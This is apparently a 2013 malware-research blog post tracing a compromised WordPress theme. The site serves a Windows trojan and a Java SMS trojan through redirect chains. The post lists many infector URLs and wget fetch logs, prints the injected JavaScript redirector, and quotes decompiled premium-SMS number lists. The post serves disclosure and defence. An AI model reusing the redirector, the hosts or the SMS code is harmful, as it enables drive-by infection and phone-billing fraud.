Here we go!
Recognizing the infection pattern reported in UrlQuery below:#MalwareMustDiehttp://urlquery.net/report.php?id=678590Bumped us to a large amount (hundreds) of malware infector URLs:inbuildhouse.ru/wp-content/themes/stroy/akismeet.php?ncrnd=YQfpcUvsYV inbuildhouse.ru/wp-content/themes/stroy/akismeet.php?ncrnd=xvGoLsqGhV inbuildhouse.ru/wp-content/themes/stroy/akismeet.php?ncrnd=xxuMdywDDk inbuildhouse.ru/wp-content/themes/stroy/akismeet.php?ncrnd=VMmujweIUQ inbuildhouse.ru/wp-content/themes/stroy/akismeet.php?ncrnd=uxsBosuiCw inbuildhouse.ru/wp-content/themes/stroy/akismeet.php?ncrnd=TxtyywoBdy inbuildhouse.ru/wp-content/themes/stroy/akismeet.php?ncrnd=UImqwXIMoh inbuildhouse.ru/wp-content/themes/stroy/akismeet.php?ncrnd=tEeWvHTtYn inbuildhouse.ru/wp-content/themes/stroy/akismeet.php?ncrnd=RfkOKspdvC inbuildhouse.ru/wp-content/themes/stroy/akismeet.php?ncrnd=qwBQIWUwOM inbuildhouse.ru/wp-content/themes/stroy/akismeet.php?ncrnd=pPNhxcgVJk inbuildhouse.ru/wp-content/themes/stroy/akismeet.php?ncrnd=pIYmBHGgee inbuildhouse.ru/wp-content/themes/stroy/akismeet.php?ncrnd=pBhEkPUQqf inbuildhouse.ru/wp-content/themes/stroy/akismeet.php?ncrnd=OHRLfRUvGK inbuildhouse.ru/wp-content/themes/stroy/akismeet.php?ncrnd=nvDLJcwTuQ inbuildhouse.ru/wp-content/themes/stroy/akismeet.php?ncrnd=msvIMqjIdB inbuildhouse.ru/wp-content/themes/stroy/akismeet.php?ncrnd=Luncwlsxkw inbuildhouse.ru/wp-content/themes/stroy/akismeet.php?ncrnd=LvGpxhVGuS inbuildhouse.ru/wp-content/themes/stroy/akismeet.php?ncrnd=lVlRWCfJvd inbuildhouse.ru/wp-content/themes/stroy/akismeet.php?ncrnd=lLcsskMdbK inbuildhouse.ru/wp-content/themes/stroy/akismeet.php?ncrnd=LprlKrYScJ inbuildhouse.ru/wp-content/themes/stroy/akismeet.php?ncrnd=kqbeUHWYWb inbuildhouse.ru/wp-content/themes/stroy/akismeet.php?ncrnd=KqqjBhNpeM inbuildhouse.ru/wp-content/themes/stroy/akismeet.php?ncrnd=LFGtIvwBnQ inbuildhouse.ru/wp-content/themes/stroy/akismeet.php?ncrnd=KpOuJWkLhY inbuildhouse.ru/wp-content/themes/stroy/akismeet.php?ncrnd=KfObcIdoVm inbuildhouse.ru/wp-content/themes/stroy/akismeet.php?ncrnd=IkxUNXUHeP inbuildhouse.ru/wp-content/themes/stroy/akismeet.php?ncrnd=HYxgeMlwsp inbuildhouse.ru/wp-content/themes/stroy/akismeet.php?ncrnd=hlwfpHMCMM inbuildhouse.ru/wp-content/themes/stroy/akismeet.php?ncrnd=HcOGfViMqN : :It is the vulnerable Wordpress with Theme "Stroy/Red Stroy" injected - with malware download URL in random made script at fake "akismeet.php" script. I think the theme was made in Russia.The PC Threat
Shortly, we fetched the sample:Resolving inbuildhouse.ru... seconds 0.00, 178.236.176.74 Caching inbuildhouse.ru => 178.236.176.74 Connecting to inbuildhouse.ru|178.236.176.74|:80... seconds 0.00, connected. : GET /wp-content/themes/stroy/akismeet.php?ncrnd=hQwgNcBXro HTTP/1.0 Accept: */* Host: inbuildhouse.ru Connection: Keep-Alive : HTTP request sent, awaiting response... : HTTP/1.1 302 Found Server: nginx/1.1.5 Date: Fri, 11 Jan 2013 11:46:02 GMT Content-Type: text/html Content-Length: 0 Connection: keep-alive X-Powered-By: PHP/5.2.17 Location: h00p://inbuildhouse.ru/wp-content/themes/stroy/update.php?q=PHOTO-DEVOCHKA : 302 Found Location: h00p://inbuildhouse.ru/wp-content/themes/stroy/update.php?q=PHOTO-DEVOCHKA [following] Skipping 0 bytes of body: [] done. --20:46:10-- h00p://inbuildhouse.ru/wp-content/themes/stroy/update.php?q=PHOTO-DEVOCHKA => `update.php@q=PHOTO-DEVOCHKA' Reusing existing connection to inbuildhouse.ru:80. : GET /wp-content/themes/stroy/update.php?q=PHOTO-DEVOCHKA HTTP/1.0 Accept: */* Host: inbuildhouse.ru Connection: Keep-Alive : HTTP request sent, awaiting response... : HTTP/1.1 200 OK Server: nginx/1.1.5 Date: Fri, 11 Jan 2013 11:46:03 GMT Content-Type: application/octet-stream Content-Length: 184243 Connection: keep-alive X-Powered-By: PHP/5.2.17 Accept-Ranges: bytes Content-disposition: attachment; filename="PHOTO-DEVOCHKA.exe" : 200 OK Length: 184,243 (180K) [application/octet-stream] 20:46:13 (78.58 KB/s) - `PHOTO-DEVOCHKA.exe' saved [184243/184243]We got the sample which turned out to be a Trojan VBS Win32/Bicololo.Below is the Virus Total scan result:
SHA1: f05b0a6734391f19838bdcb41d29d173a1d45b02 MD5: f54715875c3327953965072927e86bd0 File size: 179.9 KB ( 184243 bytes ) File name: GOLAYA-BABE.exe File type: Win32 EXE Tags: peexe bobsoft Detection ratio: 11 / 44 Analysis date: 2013-01-11 12:51:39 UTC ( 5 minutes ago ) URL --->>[VirusTotal] Malware Names: GData : VBS:Bicololo-BG TrendMicro-HouseCall : TROJ_GEN.F47V0111 Avast : VBS:Bicololo-BG [Trj] Kaspersky : UDS:DangerousObject.Multi.Generic Jiangmin : Trojan/StartPage.bim Malwarebytes : Trojan.StartPage.ooo Panda : Trj/Qhost.MR Ikarus : Trojan.Win32.Qhosts Kingsoft : Win32.Troj.Undef.(kcloud) TheHacker : Trojan/Bicololo.a Microsoft : Trojan:Win32/QHosts.BFVirus Total & (ESET) made a good description and analysis about this trojan. Our analysis result-->>[HERE] (matched to the ESET Bicololo Trojan description). Below is the network traffic we captured (click to enlarge)
The Mobile Threat
The story is not ending yet, the hacked site was filled with other infectors. we accidentally found this link:inbuildhouse.ru/wp-content/themes/stroy/Then we followed it...=> `inbuildhouse.ru/wp-content/themes/stroy/index.html' Resolving inbuildhouse.ru... 178.236.176.74 Connecting to inbuildhouse.ru|178.236.176.74|:80... connected. HTTP request sent, awaiting response... 302 Found Location: h00p://mampoks.ru [following] --20:59:13-- h00p://mampoks.ru/ => `mampoks.ru/index.html' Resolving mampoks.ru... 195.128.18.244 Connecting to mampoks.ru|195.128.18.244|:80... connected. HTTP request sent, awaiting response... 200 OK Length: 369 [text/html] 20:59:13 (11.45 MB/s) - `mampoks.ru/index.html' saved [369/369]to be forwarded to OTHER (mampoks.ru) infector. And download the index.html of that infector instead, which containing - a redirector script to ANOTHER HOST's landing page at ktozdesj.ru↓<script language="JavaScript1.1" type="text/javascript"> <!-- location.replace("h00p://ktozdesj.ru/l.php?l=o&r=9578&a=32"); //--> </script> <noscript> <meta http-equiv="Refresh" content="0; URL=h00p://ktozdesj.ru/l.php?l=o&r=9578&a=32">Your browser will download:Resolving ktozdesj.ru... seconds 0.00, 93.170.107.130 Caching ktozdesj.ru => 93.170.107.130 Connecting to ktozdesj.ru|93.170.107.130|:80... seconds 0.00, connected. GET /l.php?l=o&r=9578&a=32 HTTP/1.0 Referer: h00p://inbuildhouse.ru/wp-content/themes/stroy/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.6) Accept: */* Host: ktozdesj.ru Connection: Keep-Alive HTTP request sent, awaiting response... : HTTP/1.1 200 OK Server: nginx admin Date: Fri, 11 Jan 2013 12:01:13 GMT Content-Type: text/html Content-Length: 5307 Connection: keep-alive Vary: Accept-Encoding X-Powered-By: PHP/5.2.17 Set-Cookie: PHPSESSID=cbd9f50b900881ae84c2ecfa6cb65889; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: PHPSESSID=cbd9f50b900881ae84c2ecfa6cb65889; expires=Fri, 11-Jan-2013 13:01:13 GMT; path=/; domain=.localhost 200 OK Length: 5,307 (5.2K) [text/html] 21:01:21 (105.95 MB/s) - `l.php' saved [5307/5307]Which having malicious link below:ktozdesj.ru/getfile.php?dtype=browser&r=9578-1&a=32PoC:$ grep "getfile" 1.php l.php(24): <a href="h00p..ktozdesj.ru/getfile.php?dtype=browser&r=9578-1&a=32"><img src="landings/images/opera/images/mobile-logo.png" alt="ミ榧アミスミセミイミサミオミスミクミオ Opera Mini"></a> l.php(35): <a href="h00p..ktozdesj.ru/getfile.php?dtype=browser&r=9578-1&a=32" class="tab-link"> l.php(66): <form action="h00p..ktozdesj.ru/getfile.php?dtype=browser&r=9578-1&a=32" method="post" class="close"> l.php(80): <p id="add-source"><a href="h00p..ktozdesj.ru/getfile.php?dtype=browser&r=9578-1&a=32" class="button">ミ。ミ墟籍ァミ籍「ミャ ミイミオム€ム・クム・7.0</a></p> l.php(84): <a class="art-opn" href="h00p..ktozdesj.ru/getfile.php?dtype=browser&r=9578-1&a=32" title="ミ榧アミスミセミイミク ム・イミセム・Opera!" target="_blank"> l.php(139): <p id="add-source"><a href="h00p..ktozdesj.ru/getfile.php?dtype=browser&r=9578-1&a=32" class="button">ミ。ミ墟籍ァミ籍「ミャ ミイミオム€ム・クム・7.0</a></p>If your browser is mobile/Android you will be redirected to these url↑ And what's this lead us to?HTTP/1.1 200 OK Server: nginx admin Date: Fri, 11 Jan 2013 12:14:09 GMT Content-Type: application/java-archive Content-Length: 251481 Connection: close X-Powered-By: PHP/5.2.17 Set-Cookie: PHPSESSID=4db23831b11474b4f734f1ae64594967; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: PHPSESSID=4db23831b11474b4f734f1ae64594967; expires=Fri, 11-Jan-2013 13:14:09 GMT; path=/; domain=.localhost Content-Disposition: attachment; filename="browser_update_install.jar"Yes, another jar payload "browser_update_install.jar".File Info: browser_update_install.jar 2013/01/11 21:16 251,481 45078333eb39116c154899d3bf5501e8We analized the code to find malicious SMS sending functions-->>[HERE] Yes, it sends SMS for the international used to specific numbers, with supporting international code to call: Some number to reach...public final class k { private static String[] a = { "79202909090", "79206909090", "79219909090", "79222909090", "79232909090", "79242000690", "79262909090", "79272909090", "79282000002", "79289900028", "89282000002" }; private static String[] b = { "79168999100", "79168960220", "79116009993", "79114009993", "73434800248", "79147991000", "79147991000", "79106609999", "79135330003", "79168999800", "79139869990", "79107459999", "79171002003", "79171002003", "79112009993", "70957699100", "70957699101", "70957699102", "70957699800", "79027899999", "79029889991", "79104999104", "79107899999", "79126313456", "79128800003", "79128900003", "79129200003", "79168999101", "79168999102" }; private static String[] c = { "7922", "7929", "7932" }; : : static {{ "79037011111", "73339077000", "77059077000", "790173100", "79033619502" }[5] = "79037011110"; { "7901630", "7901631", "7901632", "7901633", "79016340", "79016341", "79016342", "79016343", "79016344", "7901640", "7901641", "790165", "790166", "7901670", "7901671", "7901672", "7901673", "7901674", "790217", "7902510", "7902511", "7902512", "7902513", "7902514", "7902515", "7902516", "7902519", "790254", "7902560", "7902561", "7902566", "7902567", "7902568", "7902569", "7902576", "7902577", "7902578", "7902579", "790276", "790411", "790412", "790413", "790414", "790415", "790864", "790865", "790866", "795005", "795006", "795007", "795008", "795009", "795010", "795011", "795012", "795013", "795014", "795261", "795262" }[59] = "795263"; d = new String[] { "7701", "7702", "7775", "7778", "73009300300", "73009300301" }; e = new String[] { "7908228", "7908229", "795297", "795298", "790219", "7902285", "7902286", "7902504", "7902507", "795025", "7950660", "7950661", "7950962", "7950963", "795225", "795230", "795326", "795393", "790408", "790409", "790453", "790878", "795071", "795113", "795114", "795115", "795176", "795242", "795243", "7900355", "7900356", "7900357", "7900358", "7900359", "790036", "7900370", "7900371", "7900372", "7900373", "7900374", "795069", "795296", "795327", "795328", "795329", "7902147", "7902148", "7902149", "7902283", "7902284", "7908225", "7908226", "7908291", "7908292", "7908293", "7908294", "7908295", "795068", "795172", "795248", "795390", "79004735", "79004736", "79004737", "79004738", "79004739", "7900474", "7900475", "7900476", "7900477", "7900478", "7900479", "7900480", "7900481", "7900482", "79004830", "79004831", "79004832", "79004833", "79004834", "790403", "790425", "7904260", "7904261", "790459", "790465", "7904857", "7904858", "7904859", "7904955", "7904956", "7904957", "7904958", "7904959", "795173", "795174", "795350", "795351", "7953520", "7953521", "7953522", "7953523", "7953524", "7900300", "7900301", "7900302", "7900303", "7900304", "7900305", "7900306", "7900307", "7900308", "7900309", "7904210", "7904211", "7904212", "7904213", "7904214", "790813", "790814", "795075", "795076", "795077", "795154", "795155", "795156", "795185", "795186", "795187", "795210", "795254", "795255", "7904245", "7904246", "7904247", "7904248", "7904249", "7904275", "7904276", "7904277", "7904278", "7904279", "790431", "790483", "795015", "795016", "795017", "795081", "795082", "795083", "795119", "795120", "795121", "795240", "795241", "79534115", "79534116", "79534117", "79534118", "79534119", "7900345", "7900346", "7900347", "7900348", "7900349", "7900350", "7900351", "7900352", "7900353", "7900354", "7902250", "7902251", "7902252", "7908290", "795067", "795205", "795211", "795279", "795331", "795332", "795333", "795346", "790437", "790457", "790496", "790499", "790894", "790895", "795026", "795027", "795057", "795058", "795059", "795116", "795117", "795118", "795157", "795158", "795159", "795160", "795161", "7952165", "7952166", "7952167", "7952168", "7952169", "7952170", "7952171", "7952172", "7952173", "7952174", "7953059", "7953060", "7953061", "7953062", "7953063", "7953064", "7953065", "7953066", "7953067", "7953068", "790052", "7951347", "7951348", "7951349", "7951350", "7951351", "7951352", "7951353", "7951354", "7951355", "7951356", "795313", "795367", "795368", "795369", "795394", "795024", "795364", "795365", "795366", "7900229", "790023", "790024", "790025", "790026", "790027", "790028", "7900290", "7900291", "7900292", "7900293", "7900294", "7900295", "7900296", "7900297", "7900298", "7902403", "7902404", "7902405", "7902406", "7902407", "7902408", "790867", "790868", "7908690", "7908691", "7908692", "7908693", "795281", "795282", "795283", "795284", "795285", "795286", "795287", "7953069", "795307", "795308", "795309", "795310", "7953110", "7953111", "7953112", "7953113", "7953114", "7953115", "7953116", "7953117", "7953118", "79534110", "79534111", "79534112", "79534113", "79534114", "790452", "790812", "795087", "795107", "795108", "795131", "795132", "795133", "795249", "7904218", "7904219", "790428", "790429", "790468", "790469", "795080", "795130", "795259", "790213", "7902281", "7902282", "7908605", "7908606", "7908607", "795089", "7951295", "7951296", "7951297", "795229", "795330", "795375", "7952314", "790404", "790405", "790406", "790439", "790815", "790816", "790823", "795060", "795061", "795062", "795244", "795245", "795276", "795277", "795278", "795355", "795356", "795357", "795136", "795137", "795138", "795139", "795290", "795291", "795292", "795293", "795294", "795376", "795377", "795378", "795379", "795380", "7953857", "7953858", "7953859", "795386", "795387", "795388", "7953890", "7953891", "7953892", "7953893", "7953894", "7953895", "7953896", "790407", "790432", "790458", "790482", "790810", "790811", "790831", "790879", "790880", "795021", "795033", "795078", "795079", "795095", "795140", "795141", "795142", "795339", "795347", "795361", "795362", "795381", "7900455", "7900456", "7900457", "7900458", "7900459", "7900460", "7900461", "7900462", "7900463", "7900464", "7953525", "7953526", "7953527", "7953528", "7953529", "795353", "795354", "795175", "795323", "795324", "7953250", "7953251", "7953252", "7953253", "7953254", "790434", "790444", "790450", "790817", "790818", "790819", "790850", "790851", "795084", "795085", "795086", "795149", "795150", "795151", "795152", "795153", "795182", "795183", "795184", "795256", "795257", "795258", "795260", "795110", "795212", "795373", "795374", "790433", "790451", "790455", "790460", "790461", "790463", "790464", "795000", "795001", "795002", "795003", "795004", "795022", "795164", "795165", "795166", "795167", "795168", "795220", "795221", "795222", "795223", "795224", "795226", "795227", "795228", "795235", "795236", "795237", "795238", "795239", "795314", "795315", "795316", "795317", "795334", "795335", "795336", "795337", "7900219", "7900220", "7900221", "7900222", "7900223", "7900224", "7900225", "7900226", "7900227", "7900228", "790436", "790828", "795070", "795169", "795170", "795171", "795253", "795299", "790410", "790420", "790422", "790423", "7904270", "7904271", "7904272", "7904273", "7904274", "790486", "7908328", "7908329", "7908715", "7908716", "7908717", "7908718", "7908719", "7950308", "7950565", "7950566", "7950567", "7950568", "7950569", "795312", "795370", "795371", "795372", "79004715", "79004716", "79004717", "79004718", "79004719", "7900472", "79004730", "79004731", "79004732", "79004733", "79004734", "790400", "790401", "790402", "790435", "795206", "795215", "7952160", "7952161", "7952162", "7952163", "7952164", "7952175", "7952176", "7952177", "7952178", "7952179", "7952180", "7952181", "7952182", "7952183", "7952184", "795280", "795288", "795289", "795391", "795392", "795090", "795091", "795092", "7952015", "7952016", "7952017", "7952018", "7952019", "7952185", "7952186", "7952187", "7952188", "7952189", "795318", "795319", "7953419", "795342", "795343", "7953440", "7953441", "7953442", "7953443", "795395", "795396", "7953970", "7953971", "7953972", "7953973", "7953974", "790430", "790497", "790804", "790805", "790806", "790857", "790858", "795072", "795073", "795074", "795111", "795112", "795144", "795145", "795146", "795147", "795148", "795177", "795178", "795179", "795180", "795181", "795250", "795251", "795252" }; { "38050", "38095", "38066" }[3] = "38099"; { "790208", "7902200", "7902203", "7902204", "7902205", "7902206", "7902207", "7902208", "7902209", "790234", "7902352", "7902353", "7902354", "79047299", "790852", "790853" }[16] = "795023"; f = new String[] { "7705", "7777", "7771" }; }}Some country code...jdField_a_of_type_JavaUtilHashtable.put("7840", "ab"); jdField_a_of_type_JavaUtilHashtable.put("7940", "ab"); jdField_b_of_type_JavaUtilHashtable.put("994", "az"); jdField_b_of_type_JavaUtilHashtable.put("213", "alzhir"); jdField_b_of_type_JavaUtilHashtable.put("374", "am"); jdField_b_of_type_JavaUtilHashtable.put("375", "by"); jdField_b_of_type_JavaUtilHashtable.put("359", "bolgaria"); jdField_b_of_type_JavaUtilHashtable.put("387", "bosniaigerc"); jdField_b_of_type_JavaUtilHashtable.put("502", "gvatemala"); jdField_b_of_type_JavaUtilHashtable.put("504", "gonduras"); jdField_b_of_type_JavaUtilHashtable.put("852", "gonkong"); jdField_b_of_type_JavaUtilHashtable.put("972", "israel"); jdField_b_of_type_JavaUtilHashtable.put("962", "iordania"); jdField_b_of_type_JavaUtilHashtable.put("855", "kambodzha");Virus Total checks shows:MD5: 45078333eb39116c154899d3bf5501e8 File size: 245.6 KB ( 251481 bytes ) File name: browser_update_install.jar File type: JAR Tags: jar Detection ratio: 31 / 46 Analysis date: 2013-01-11 12:17:18 UTC ( 1 hour, 58 minutes ago ) URL --->>[VirusTotal] Malware Names: MicroWorld-eScan : Trojan.Java.Smssend.W nProtect : Trojan.Java.Smssend.W CAT-QuickHeal : Trojan.JavaExploit McAfee : Generic.dx!bfzk K7AntiVirus : Trojan F-Prot : Java/SMSer.L Symantec : Trojan.Gen.2 Norman : SMSSend.CX TotalDefense : Java/SMSTroj.Q TrendMicro-HouseCall : TROJ_GEN.FCBHZIK Avast : Java:SMSSend-GF [Expl] ClamAV : Android.Trojan.Smssend-7 Kaspersky : Trojan-SMS.J2ME.Jifake.my BitDefender : Trojan.Java.Smssend.W NANO-Antivirus : Trojan.SmsSend.wgugf Sophos : Troj/Jifake-A Comodo : UnclassifiedMalware F-Secure : Trojan.Java.Smssend.W DrWeb : Java.SMSSend.780 AntiVir : JAVA/Badorg.BA TrendMicro : JAVA_SMSAGE.NT Emsisoft : Trojan.Java.Smssend.W (B) Jiangmin : Trojan/AndroidOS.afcr Microsoft : Trojan:Java/SMSer.AY ViRobot : J2ME.A.Jifake.2840 GData : Trojan.Java.Smssend.W Commtouch : Java/SMSer.L ESET-NOD32 : a variant of J2ME/TrojanSMS.Agent.DH Ikarus : JAVA.SMSSend Fortinet : Java/SMSBoxer.AQ!tr AVG : Java/SMS.OOResearch Materials
To the fellow researchers & AV industry, samples & analysis data is-->>[HERE]
